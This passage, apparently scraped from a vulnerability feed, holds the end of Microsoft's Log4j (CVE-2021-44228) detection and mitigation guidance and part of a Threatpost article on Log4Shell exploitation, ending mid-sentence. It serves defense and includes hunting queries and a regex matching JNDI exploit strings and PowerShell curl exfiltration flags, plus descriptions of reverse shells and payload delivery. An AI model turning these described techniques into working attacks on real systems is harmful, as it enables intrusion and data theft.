via advanced hunting:\n\n\n\n_Figure 18. Sample email event surfaced via advanced hunting _\n\n#### Microsoft 365 Defender advanced hunting queries\n\nTo locate possible exploitation activity, run the following queries:\n\n**Possible malicious indicators in cloud application events**\n\nThis query is designed to flag exploitation attempts for cases where the attacker is sending the crafted exploitation string using vectors such as User-Agent, Application or Account name. The hits returned from this query are most likely unsuccessful attempts, however the results can be useful to identity attackers\u2019 details such as IP address, Payload string, Download URL, etc. \n \n \n CloudAppEvents\n | where Timestamp > datetime(\"2021-12-09\")\n | where UserAgent contains \"jndi:\" \n or AccountDisplayName contains \"jndi:\"\n or Application contains \"jndi:\"\n or AdditionalFields contains \"jndi:\"\n | project ActionType, ActivityType, Application, AccountDisplayName, IPAddress, UserAgent, AdditionalFields\n\n**Alerts related to Log4j vulnerability**\n\nThis query looks for alert activity pertaining to the Log4j vulnerability.\n \n \n AlertInfo\n | where Title in~('Suspicious script launched',\n 'Exploitation attempt against Log4j (CVE-2021-44228)',\n 'Suspicious process executed by a network service',\n 'Possible target of Log4j exploitation (CVE-2021-44228)',\n 'Possible target of Log4j exploitation',\n 'Possible Log4j exploitation',\n 'Network connection seen in CVE-2021-44228 exploitation',\n 'Log4j exploitation detected',\n 'Possible exploitation of CVE-2021-44228',\n 'Possible target of Log4j vulnerability (CVE-2021-44228) scanning',\n 'Possible source of Log4j exploitation',\n 'Log4j exploitation attempt via cloud application', // Previously titled Exploitation attempt against Log4j\n 'Log4j exploitation attempt via email' // Previously titled Log4j Exploitation Attempt\n )\n\n**Devices with Log4j vulnerability alerts and additional other alert-related context**\n\nThis query surfaces devices with Log4j-related alerts and adds additional context from other alerts on the device. \n \n \n // Get any devices with Log4J related Alert Activity\n let DevicesLog4JAlerts = AlertInfo\n | where Title in~('Suspicious script launched',\n 'Exploitation attempt against Log4j (CVE-2021-44228)',\n 'Suspicious process executed by a network service',\n 'Possible target of Log4j exploitation (CVE-2021-44228)',\n 'Possible target of Log4j exploitation',\n 'Possible Log4j exploitation',\n 'Network connection seen in CVE-2021-44228 exploitation',\n 'Log4j exploitation detected',\n 'Possible exploitation of CVE-2021-44228',\n 'Possible target of Log4j vulnerability (CVE-2021-44228) scanning',\n 'Possible source of Log4j exploitation'\n 'Log4j exploitation attempt via cloud application', // Previously titled Exploitation attempt against Log4j\n 'Log4j exploitation attempt via email' // Previouskly titled Log4j Exploitation Attempt\n )\n // Join in evidence information\n | join AlertEvidence on AlertId\n | where DeviceId != \"\"\n | summarize by DeviceId, Title;\n // Get additional alert activity for each device\n AlertEvidence\n | where DeviceId in(DevicesLog4JAlerts)\n // Add additional info\n | join kind=leftouter AlertInfo on AlertId\n | summarize DeviceAlerts = make_set(Title), AlertIDs = make_set(AlertId) by DeviceId, bin(Timestamp, 1d)\n\n**Suspected exploitation of Log4j vulnerability**\n\nThis query looks for exploitation of the vulnerability using known parameters in the malicious string. It surfaces exploitation but may surface legitimate behavior in some environments.\n \n \n DeviceProcessEvents\n | where ProcessCommandLine has_all('${jndi') and ProcessCommandLine has_any('ldap', 'ldaps', 'http', 'rmi', 'dns', 'iiop')\n //Removing FPs \n | where not(ProcessCommandLine has_any('stackstorm', 'homebrew')) \n\n**Regex to identify malicious exploit string**\n\nThis query looks for the malicious string needed to exploit this vulnerability.\n \n \n DeviceProcessEvents\n | where ProcessCommandLine matches regex @'(?i)\\$\\{jndi:(ldap|http|https|ldaps|dns|rmi|iiop):\\/\\/(\\$\\{([a-z]){1,20}:([a-z]){1,20}\\})?(([a-zA-Z0-9]|-){2,100})?(\\.([a-zA-Z0-9]|-){2,100})?\\.([a-zA-Z0-9]|-){2,100}\\.([a-z0-9]){2,20}(\\/).*}' \n or InitiatingProcessCommandLine matches regex @'(?i)\\$\\{jndi:(ldap|http|https|ldaps|dns|rmi|iiop):\\/\\/(\\$\\{([a-z]){1,20}:([a-z]){1,20}\\})?(([a-zA-Z0-9]|-){2,100})?(\\.([a-zA-Z0-9]|-){2,100})?\\.([a-zA-Z0-9]|-){2,100}\\.([a-z0-9]){2,20}(\\/).*}'\n\n**Suspicious process event creation from VMWare Horizon TomcatService**\n\nThis query identifies anomalous child processes from the _ws_TomcatService.exe_ process associated with the exploitation of the Log4j vulnerability in VMWare Horizon installations. These events warrant further investigation to determine if they are in fact related to a vulnerable Log4j application.\n \n \n DeviceProcessEvents\n | where InitiatingProcessFileName has \"ws_TomcatService.exe\"\n | where FileName != \"repadmin.exe\"\n\n**Suspicious JScript staging comment**\n\nThis query identifies a unique string present in malicious PowerShell commands attributed to threat actors exploiting vulnerable Log4j applications. These events warrant further investigation to determine if they are in fact related to a vulnerable Log4j application.\n \n \n DeviceProcessEvents\n | where FileName has \"powershell.exe\"\n | where ProcessCommandLine has \"VMBlastSG\"\n \n\n**Suspicious PowerShell curl flags**\n\nThis query identifies unique, uncommon PowerShell flags used by curl to post the results of an attacker-executed command back to the command-and-control infrastructure. If the event is a true positive, the contents of the \u201cBody\u201d argument are Base64-encoded results from an attacker-issued comment. These events warrant further investigation to determine if they are in fact related to a vulnerable Log4j application.\n \n \n DeviceProcessEvents\n | where FileName has \"powershell.exe\"\n | where ProcessCommandLine has_all(\"-met\", \"POST\", \"-Body\")\n\n### Microsoft Defender for Cloud\n\nMicrosoft Defender for Cloud\u2019s threat detection capabilities have been expanded to surface exploitation of CVE-2021-44228 in several relevant security alerts:\n\nOn Windows:\n\n * Detected obfuscated command line\n * Suspicious use of PowerShell detected\n\nOn Linux:\n\n * Suspicious file download\n * Possible Cryptocoinminer download detected\n * Process associated with digital currency mining detected\n * Potential crypto coin miner started\n * A history file has been cleared\n * Suspicious Shell Script Detected\n * Suspicious domain name reference\n * Digital currency mining related behavior detected\n * Behavior similar to common Linux bots detected\n\n### Microsoft Defender for IoT\n\nMicrosoft Defender for IoT has released a dedicated threat Intelligence update package for detecting Log4j 2 exploit attempts on the network (example below). \n\n\n\n_Figure 19. Microsoft Defender for IoT alert_ \n\nThe package is available for download from the [Microsoft Defender for IoT portal](<https://ms.portal.azure.com/#blade/Microsoft_Azure_IoT_Defender/IoTDefenderDashboard/Getting_Started>) (Click _Updates_, then _Download file _(MD5: 4fbc673742b9ca51a9721c682f404c41). \n\n\n\n_Figure 20. Microsoft Defender for IoT sensor threat intelligence update_\n\nMicrosoft Defender for IoT now pushes new threat intelligence packages to cloud-connected sensors upon release, [click here ](<https://docs.microsoft.com/en-us/azure/defender-for-iot/organizations/release-notes>)for more information. Starting with sensor version 10.3, users can automatically receive up-to-date threat intelligence packages through Microsoft Defender for IoT.\n\nWorking with automatic updates reduces operational effort and ensures greater security. Enable automatic updating on the [Defender for IoT portal](<https://ms.portal.azure.com/#blade/Microsoft_Azure_IoT_Defender/IoTDefenderDashboard/Sites>) by onboarding your cloud-connected sensor with the toggle for Automatic Threat Intelligence Updates turned on. For more information about threat intelligence packages in Defender for IoT, please refer to the [documentation](<https://docs.microsoft.com/en-us/azure/defender-for-iot/organizations/how-to-work-with-threat-intelligence-packages>).\n\n### Microsoft Sentinel\n\nA new Microsoft Sentinel solution has been added to the Content Hub that provides a central place to install Microsoft Sentinel specific content to monitor, detect, and investigate signals related to exploitation of the CVE-2021-44228 vulnerability.\n\n\n\n_Figure 21. Log4j Vulnerability Detection solution in Microsoft Sentinel_\n\nTo deploy this solution, in the Microsoft Sentinel portal, select **Content hub (Preview)** under **Content Management**, then search for **Log4j** in the search bar. Select the **Log4j vulnerability detection** solution, and click **Install**. Learn how to [centrally discover and deploy Microsoft Sentinel out-of-the-box content and solutions](<https://docs.microsoft.com/azure/sentinel/sentinel-solutions-deploy>).\n\n\n\n_Figure 22. Microsoft Sentinel Analytics showing detected Log4j vulnerability_\n\nNote: We recommend that you check the solution for updates periodically, as new collateral may be added to this solution given the rapidly evolving situation. This can be verified on the main Content hub page.\n\n#### Microsoft Sentinel queries\n\nMicrosoft Sentinel customers can use the following detection queries to look for this activity:\n\n * [Possible exploitation of Apache Log4j component detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Apache_log4j_Vulnerability.yaml>)\n\nThis hunting query looks for possible attempts to exploit a remote code execution vulnerability in the Log4j component of Apache. Attackers may attempt to launch arbitrary code by passing specific commands to a server, which are then logged and executed by the Log4j component.\n\n * [Cryptocurrency miners EXECVE](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/CryptoCurrencyMiners.yaml>)\n\nThis query hunts through EXECVE syslog data generated by AUOMS to find instances of cryptocurrency miners being downloaded. It returns a table of suspicious command lines.\n\n * [Azure WAF Log4j CVE-2021-44228 hunting](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/AzureDiagnostics/WAF_log4j_vulnerability.yaml>)\n\nThis hunting query looks in Azure Web Application Firewall data to find possible exploitation attempts for CVE-2021-44228 involving Log4j vulnerability.\n\n * [Log4j vulnerability exploit aka Log4Shell IP IOC](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Log4J_IPIOC_Dec112021.yaml>)\n\nThis hunting query identifies a match across various data feeds for IP IOCs related to the Log4j exploit described in CVE-2021-44228.\n\n * [Suspicious shell script detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Suspicious_ShellScript_Activity.yaml>)\n\nThis hunting query helps detect post-compromise suspicious shell scripts that attackers use for downloading and executing malicious files. This technique is often used by attackers and was recently used to exploit the vulnerability in Log4j component of Apache to evade detection and stay persistent or for more exploitation in the network.\n\n * [Azure WAF matching for ](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AzureDiagnostics/AzureWAFmatching_log4j_vuln.yaml>)[CVE-2021-44228](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AzureDiagnostics/AzureWAFmatching_log4j_vuln.yaml>)[ Log4j vulnerability](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AzureDiagnostics/AzureWAFmatching_log4j_vuln.yaml>)\n\nThis query alerts on a positive pattern match by Azure WAF for CVE-2021-44228 Log4j exploitation attempt. If possible, it then decodes the malicious command for further analysis.\n\n * [Suspicious Base64 download activity detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Base64_Download_Activity.yaml>)\n\nThis hunting query helps detect suspicious encoded Base64 obfuscated scripts that attackers use to encode payloads for downloading and executing malicious files. This technique is often used by attackers and was recently used to the Log4j vulnerability in order to evade detection and stay persistent in the network.\n\n * _[Linux security-related process termination activity detected ](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Process_Termination_Activity.yaml>)_\n\nThis query alerts on attempts to terminate processes related to security monitoring. Attackers often try to terminate such processes post-compromise as seen recently to exploit the CVE-2021-44228 vulnerability.\n\n * [Suspicious manipulation of firewall detected via Syslog data](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Firewall_Disable_Activity.yaml>)\n\nThis query uses syslog data to alert on any suspicious manipulation of firewall to evade defenses. Attackers often perform such operations as seen recently to exploit the CVE-2021-44228 vulnerability for C2 communications or exfiltration.\n\n * [User agent search for Log4j exploitation attempt](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/UserAgentSearch_log4j.yaml>)\n\nThis query uses various log sources having user agent data to look for CVE-2021-44228 exploitation attempt based on user agent pattern.\n\n * [Network connections to LDAP port for CVE-2021-44228 vulnerability](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/MultipleDataSources/NetworkConnectionldap_log4j.yaml>)\n\nThis hunting query looks for connection to LDAP port to find possible exploitation attempts for CVE-2021-44228.\n\n * [Linux toolkit detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Linux_Toolkit_Detected.yaml>)\n\nThis query uses syslog data to alert on any attack toolkits associated with massive scanning or exploitation attempts against a known vulnerability\n\n * [Container miner activity](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Container_Miner_Activity.yaml>)\n\nThis query uses syslog data to alert on possible artifacts associated with containers running images related to digital cryptocurrency mining.\n\n * [Network connection to new external LDAP server](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/CommonSecurityLog/NetworkConnectionToNewExternalLDAPServer.yaml>)\n\nThis query looks for outbound network connections using the LDAP protocol to external IP addresses, where that IP address has not had an LDAP network connection to it in the 14 days preceding the query timeframe. This could indicate someone exploiting a vulnerability such as CVE-2021-44228 to trigger the connection to a malicious LDAP server.\n\n### Azure Firewall Premium \n\nCustomers using Azure Firewall Premium have enhanced protection from the Log4j RCE CVE-2021-44228 vulnerability and exploit. Azure Firewall premium IDPS (Intrusion Detection and Prevention System) provides IDPS inspection for all east-west traffic and outbound traffic to internet. The vulnerability rulesets are continuously updated and include CVE-2021-44228 vulnerability for different scenarios including UDP, TCP, HTTP/S protocols since December 10th, 2021. Below screenshot shows all the scenarios which are actively mitigated by Azure Firewall Premium.\n\n**Recommendation:** Customers are recommended to configure [Azure Firewall Premium](<https://docs.microsoft.com/en-us/azure/firewall/premium-migrate>) with both IDPS Alert &amp; Deny mode and TLS inspection enabled for proactive protection against **CVE-2021-44228** exploit. \n\n\n\n_Figure 23. Azure Firewall Premium portal_\n\nCustomers using Azure Firewall Standard can migrate to Premium by following [these directions](<https://docs.microsoft.com/en-us/azure/firewall/premium-migrate>). Customers new to Azure Firewall premium can learn more about [Firewall Premium](<https://docs.microsoft.com/en-us/azure/firewall/premium-features>).\n\n### Azure Web Application Firewall (WAF)\n\nIn response to this threat, Azure Web Application Firewall (WAF) has updated Default Rule Set (DRS) versions 1.0/1.1 available for Azure Front Door global deployments, and OWASP ModSecurity Core Rule Set (CRS) version 3.0/3.1 available for Azure Application Gateway V2 regional deployments.\n\nTo help detect and mitigate the Log2Shell vulnerability by inspecting requests\u2019 headers, URI, and body, we have released the following:\n\n * For Azure Front Door deployments, we have updated the rule **944240 \u201cRemote Command Execution\u201d** under Managed Rules\n * For Azure Application Gateway V2 regional deployments, we have introduced a new rule **Known-CVEs/800100** in the rule group Known-CVEs under Managed Rules\n\nThese rules are already enabled by default in block mode for all existing WAF Default Rule Set (DRS) 1.0/1.1 and OWASP ModSecurity Core Rule Set (CRS) 3.0/3.1 configurations. Customers using WAF Managed Rules would have already received enhanced protection for Log4j 2 vulnerabilities ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228>) and [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>)); no additional action is needed.\n\n**Recommendation**: Customers are recommended to enable WAF policy with Default Rule Set 1.0/1.1 on their Front Door deployments, or with OWASP ModSecurity Core Rule Set (CRS) versions 3.0/3.1 on Application Gateway V2 to immediately enable protection from this threat, if not already enabled. For customers who have already enabled DRS 1.0/1.1 or CRS 3.0/3.1, no action is needed. We will continue to monitor threat patterns and modify the above rule in response to emerging attack patterns as required.\n\n\n\n_Figure 24. Remote Code Execution rule for Default Rule Set (DRS) versions 1.0/1.1 _\n\n\n\n_Figure 25. Remote Code Execution rule for OWASP ModSecurity Core Rule Set (CRS) version 3.1_\n\nNote: The above protection is also available on Default Rule Set (DRS) 2.0 preview version and OWASP ModSecurity Core Rule Set (CRS) 3.2 preview version, which are available on Azure Front Door Premium and Azure Application Gateway V2 respectively. Customers using Azure CDN Standard from Microsoft can also turn on the above protection by enabling DRS 1.0.\n\nMore information about Managed Rules and Default Rule Set (DRS) on Azure Web Application Firewall can be found [here](<https://docs.microsoft.com/azure/web-application-firewall/afds/waf-front-door-drs>). More information about Managed Rules and OWASP ModSecurity Core Rule Set (CRS) on Azure Web Application Firewall can be found [here](<https://docs.microsoft.com/azure/web-application-firewall/ag/application-gateway-crs-rulegroups-rules>).\n\n## Indicators of compromise (IOCs)\n\nMicrosoft Threat Intelligence Center (MSTIC) has provided a list of IOCs related to this attack and will update them with new indicators as they are discovered: [](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Log4J_IPIOC_Dec112021.yaml>)[https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample Data/Feeds/Log4j_IOC_List.csv](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/Log4j_IOC_List.csv>)\n\nMicrosoft will continue to monitor this dynamic situation and will update this blog as new threat intelligence and detections/mitigations become available.\n\n#### Revision history\n\n**_[01/19/2022] _**_New information about an unrelated vulnerability we discovered while investigating Log4j attacks_\n\n_**[01/11/2022]** New threat and vulnerability management capabilities to apply mitigation directly from the portal, as well as new advanced hunting queries _\n\n_**[01/10/2022] **Added new information about a China-based ransomware operator targeting internet-facing systems and deploying the NightSky ransomware_\n\n**_[01/07/2022] _**_Added a new rule group in _Azure Web Application Firewall (WAF)_ _\n\n**_[12/27/2021] _**_New capabilities in __threat and vulnerability management__ including a new advanced hunting schema and support for Linux, which requires updating the Microsoft Defender for Linux client; new Microsoft Defender for Containers solution._\n\n_**[12/22/2021]** Added new protections across Microsoft 365 Defender, including Microsoft Defender for Office 365._\n\n_**[12/21/2021]**_ _Added a note on testing services and assumed benign activity and additional guidance to use the **Need help?** button in the Microsoft 365 Defender portal._\n\n**_[12/17/2021] _**_New updates to observed activity, including more information about limited ransomware attacks and additional payloads; additional updates to protections from Microsoft 365 Defender and Azure Web Application Firewall (WAF), and new Microsoft Sentinel queries._\n\n_**[12/16/2021] **New Microsoft Sentinel solution and additional Microsoft Defender for Endpoint detections._\n\n_**[12/15/2021] **Details _about ransomware attacks on non-Microsoft hosted Minecraft servers, as well as updates to product guidance, including threat and vulnerability management._ _\n\n_**[12/14/2021] **New insights about multiple threat actors taking advantage of this vulnerability, _including nation-state actors and access brokers linked to ransomware._ _\n\nThe post [Guidance for preventing, detecting, and hunting for exploitation of the Log4j 2 vulnerability](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T05:29:03", "type": "mssecure", "title": "Guidance for preventing, detecting, and hunting for exploitation of the Log4j 2 vulnerability", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-34473", "CVE-2021-35247", "CVE-2021-44228", "CVE-2021-4428", "CVE-2021-44428", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-12T05:29:03", "id": "MSSECURE:42ECD98DCF925DC4063DE66F75FB5433", "href": "https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2022-01-05T19:45:42", "description": "No surprise here: The holidays bought no Log4Shell relief.\n\nThreat actors vigorously launched exploit attempts and testing during the last weeks of December, Microsoft said on Monday, in the latest update to its [landing page](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>) and guidance around the flaws in Apache\u2019s Log4j logging library.\n\n\u201cWe have observed many existing attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks,\u201d according to Microsoft.\n\nThis comes on the heels of news that relentless Log4Shell attacks have come from nation-state actors that are both testing and have already implemented the exploit: As of Dec. 15, more than 1.8 million attacks, against [half of all corporate networks](<https://threatpost.com/log4j-attacks-state-actors-worm/177088/>), using at least 70 distinct malware families, had already been launched to exploit the bugs.\n\n## **What is Log4Shell?**\n\nThe remote code execution (RCE) vulnerabilities in Apache Log4j 2 \u2013 [CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228>), [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>), [CVE-2021-44832](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44832>) \u2013 are collectively referred to as Log4Shell. Within hours of the initial flaw\u2019s [public disclosure](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) on Dec. 10, [attackers](<https://threatpost.com/patching-time-log4j-exploits-vaccine/177017/>) were scanning for vulnerable servers and [unleashing quickly evolving attacks](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) to drop coin-miners, Cobalt Strike, the Orcus remote access trojan (RAT), reverse bash shells for future attacks, [Mirai and other botnets](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>), and backdoors.\n\nThe new attack vector presented by Log4Shell is vast, severe and has ample potential for widespread exploitation. The flaw, which is uber-easy to exploit, is resident in the ubiquitous Java logging library Apache Log4j and could allow unauthenticated RCE and complete server takeover.\n\nWithin three days of the flaw\u2019s disclosure, it was [spitting out mutations](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>). Within 10 days, the notorious Conti ransomware gang had created a [holistic Log4Shell attack chain](<https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/>). As of last week, Dec. 30, the advanced persistent threat (APT) Aquatic Panda was targeting universities with Log4Shell exploit tools in an [attempt to steal industrial intelligence](<https://threatpost.com/aquatic-panda-log4shell-exploit-tools/177312/>) and military secrets.\n\n## Obfuscated HTTP Requests\n\nMost recently, Microsoft has observed attackers obfuscating the HTTP requests made against targeted systems. Those requests generate a log using Log4j 2 that leverages Java Naming and Directory Interface (JNDI) to perform a request to the attacker-controlled site. The vulnerability then causes the exploited process to reach out to the site and execute the payload.\n\nMicrosoft has observed many attacks in which the attacker-owned parameter is a DNS logging system, intended to log a request to the site to fingerprint the vulnerable systems. The crafted string that enables Log4Shell exploitation contains \u201cjndi,\u201d following by the protocol \u2013 such as \u201cldap,\u201d \u201cldaps\u201d \u201crmi,\u201d \u201cdns,\u201d \u201ciiop,\u201d or \u201chttp\u201d \u2013 and then the attacker domain.\n\nBut to evade detection, attackers are mixing up the request patterns: For example, Microsoft has seen exploit code written that runs a lower or upper command within the exploitation string. Even more complicated obfuscation attempts are being made to try to bypass string-matching detections, such as that shown in the string sample below:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/01/04163333/string-e1641332031855.jpg>)\n\n## Minecraft Servers Still Being Exploited\n\nExploitation continues on non-Microsoft-hosted Minecraft servers, the company said: as in, the same type of servers where Log4j was first discovered.\n\nMicrosoft confirmed public reports of Khonsari ransomware being delivered as payload post-exploitation, as [Bitdefender](<https://businessinsights.bitdefender.com/technical-advisory-zero-day-critical-vulnerability-in-log4j2-exploited-in-the-wild>) has detailed. Microsoft Defender antivirus data has shown a small number of cases being launched from compromised Minecraft clients connected to modified Minecraft servers running a vulnerable version of Log4j 2 via the use of a third-party Minecraft mods loader, the company said.\n\n\u201cIn these cases, an adversary sends a malicious in-game message to a vulnerable Minecraft server, which exploits CVE-2021-44228 to retrieve and execute an attacker-hosted payload on both the server and on connected vulnerable clients,\u201d Microsoft said. \u201cWe observed exploitation leading to a malicious Java class file that is the Khonsari ransomware, which is then executed in the context of _javaw.exe_ to ransom the device.\u201d\n\nWhile Minecraft isn\u2019t commonly installed in enterprise networks, Microsoft has nonetheless also observed PowerShell-based reverse shells being dropped to Minecraft client systems via the same malicious message technique, enabling an actor to fully take over a compromised system, which they then use to run Mimikatz to steal credentials.\n\n\u201cThese techniques are typically associated with enterprise compromises with the intent of lateral movement,\u201d Microsoft said, meaning that the goal in targeting of Minecraft users, who tend to be children, seems unclear. It\u2019s early yet in this campaign: There hasn\u2019t yet been detectible follow-on activity yet, \u201cindicating that the attacker may be gathering access for later use.\u201d\n\nMicrosoft urged Minecraft customers running their own servers to deploy the latest Minecraft server update and for players to exercise caution by only connecting to trusted Minecraft servers.\n\n## Nation-State Activity\n\nMicrosoft\u2019s Threat Intelligence Center (MSTIC) has also observed the CVE-2021-44228 flaw being used by multiple tracked nation-state activity groups originating from China, Iran, North Korea and Turkey.\n\nThe actors are experimenting during development, integrating the vulnerabilities to in-the-wild payload deployment, and sending exploitations against targets.\n\nOne example: MSTIC has observed the ransomware-wielding, Iranian [Phosphorus](<https://threatpost.com/apt-ta453-siphons-intel-mideast/167715/>) actor \u2013 aka Charming Kitten, TA453, APT35, Ajax Security Team, NewsBeef or Newscaster, et al. \u2013 acquiring and making modifications of the Log4j exploit.\n\n\u201cWe assess that Phosphorus has operationalized these modifications,\u201d Microsoft observed.\n\nMSTIC has also seen the China-linked [Hafnium](<https://threatpost.com/fbi-proxylogon-web-shells/165400/>) group using the vulnerability to attack virtualization infrastructure in order to extend the group\u2019s typical targeting. \u201cIn these attacks, Hafnium-associated systems were observed using a DNS service typically associated with testing activity to fingerprint systems,\u201d researchers noted.\n\nMicrosoft\u2019s \u201cI\u2019m-a-broken-record\u201d advice: Update affected products and services, and apply security patches ASAP.\n\n\u201cWith nation-state actors testing and implementing the exploit and known ransomware-associated access brokers using it, we highly recommend applying security patches and updating affected products and services as soon as possible,\u201d Microsoft said.\n\n## RAT Infestation\n\nMicrosoft is also seeing additional remote-access toolkits and reverse shells being dropped via exploitation of CVE-2021-44228, which is malware that actors use for hands-on-keyboard attacks. Besides the Cobalt Strike beacons and PowerShell reverse shells seen in earlier reports, the company has also seen Meterpreter, Bladabindi and HabitsRAT.\n\n\u201cFollow-on activities from these shells have not been observed at this time, but these tools have the ability to steal passwords and move laterally,\u201d Microsoft noted.\n\nThe activity is coming from small-scale, possibly more targeted attacks (possibly related to testing campaigns), the software giant said. Also, researchers have observed the addition of CVE-2021-44428 to existing campaigns that were exploiting vulnerabilities to drop remote access tools. Microsoft said that the HabitsRAT campaign overlapped with infrastructure used in prior campaigns.\n\n## Other Log4Shell Developments\n\nMicrosoft has also seen:\n\n**Multiple ransomware access brokers** using the vulnerability to gain initial access to target networks \u2013 access that they sell to ransomware-as-a-service (RaaS) affiliates. \u201cWe have observed these groups attempting exploitation on both Linux and Windows systems, which may lead to an increase in human-operated ransomware impact on both of these operating system platforms,\u201d Microsoft said.\n\n**Mass scanning by both attackers and security researchers. **The vulnerability has rapidly gotten sucked up into existing [botnets like Mirai](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>), existing campaigns previously targeting vulnerable Elasticsearch systems to deploy cryptocurrency miners, and activity deploying the Tsunami backdoor to Linux systems. \u201cMany of these campaigns are running concurrent scanning and exploitation activities for both Windows and Linux systems, using Base64 commands included in the JDNI:ldap:// request to launch bash commands on Linux and PowerShell on Windows,\u201d the company said.\n\n**No big spikes in ransomware attacks.** True, ransomware has been delivered via modified Minecraft clients, but so far it\u2019s been only a small number of cases. That could change, given that access brokers associated with RaaS affiliates are folding the vulnerability into their initial-access toolkits. But Microsoft is also seeing older ransomware payloads in limited use by security researchers and a small number of attackers. \u201cIn some instances, they appear to be experimenting with deployments via scanning and modified Minecraft servers,\u201d Microsoft said. \u201cAs part of these experiments, some ransomware payloads seem to have been deployed to systems that were previously compromised and were originally dropping coin-miner payloads.\u201d\n\n**Webtoos Malware.** Webtoos, a malware with distributed denial-of-service (DDoS) capabilities and persistence mechanisms that could allow an attacker to wreak yet more havoc, is also being deployed via the Log4Shell vulnerability. \u201cAttackers\u2019 use of this malware or intent is not known at this time, but the campaign and infrastructure have been in use and have been targeting both Linux and Windows systems prior to this vulnerability,\u201d Microsoft said.\n\nMicrosoft\u2019s post has extensive advice on attack vectors and observed activity, finding and remediating vulnerable apps and systems, detecting and responding to exploitation attempts and other related attacker activity, and indicators of compromise (IoCs).\n\n## This Is Just the Start\n\nAs if all that weren\u2019t enough, it\u2019s all likely going to get worse, Microsoft said. Just like Log4j is tucked away into nooks and crannies, so too are exploits going to get added to yet more attacker toolkits: \u201cThe majority of attacks we have observed so far have been mainly mass scanning, coin-mining, establishing remote shells and red-team activity, but it\u2019s highly likely that attackers will continue adding exploits for these vulnerabilities to their toolkits,\u201d Microsoft said.\n\n## How Do You Even Know Where Log4J Is Lurking?\n\nA massive part of the Log4Shell nightmare is the fact that it\u2019s not always obvious which software is using a vulnerable version of the Log4j library.\n\nWhile Microsoft has laid out several methods for detecting active exploit attempts using Log4j, identifying the vulnerable version before an attack would be \u201cideal,\u201d according to Ray Kelly, a fellow at NTT Application Security.\n\n\u201cThis will be a continuing battle for both consumers and vendors going forward into 2022 in what will need to be a two-pronged approach,\u201d Kelly told Threatpost. \u201cSecurity vendors have been quick on the response for consumers by adding log4j rules that enable DAST [[dynamic application security scanning](<https://www.rapid7.com/fundamentals/dast/>)] scanners to detect if a website can be exploited with a malicious log4j web request against a company\u2019s web server. At the same time, vendors must ensure that they are not shipping software with the vulnerable version using tools such as SCA [[service component architecture](<https://www.ibm.com/docs/en/cics-ts/6.1_beta?topic=applications-service-component-architecture-sca>)].\u201d\n\n## Asking What to Do? It\u2019s a Little Late for 